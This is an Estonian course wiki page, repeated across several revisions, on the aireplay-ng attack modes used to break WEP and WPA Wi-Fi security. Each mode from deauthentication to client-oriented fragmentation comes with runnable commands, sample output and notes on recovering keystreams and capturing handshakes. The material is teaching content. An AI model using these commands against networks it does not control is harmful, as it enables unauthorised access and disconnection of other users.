Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

===Kasutamine===
<pre>$ sudo aireplay-ng -7 -h CC:CC:CC:CC:CC:CC -D mon0
...
</pre>

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:26:56Z

Tliiv: /* Teooria */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA mon0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Waiting for a data packet...
Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = CC:CC:CC:CC:CC:CC
Source MAC = BB:BB:BB:BB:BB:BB

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y
Saving chosen packet in replay_src-0001-123456.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0001-123456.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

<pre>
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0
...
</pre>

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

===Kasutamine===
<pre>$ sudo aireplay-ng -7 -h CC:CC:CC:CC:CC:CC -D mon0
...
</pre>

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:26:43Z

Tliiv: /* Rünnak 7: Client-oriented fragmentation attack */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
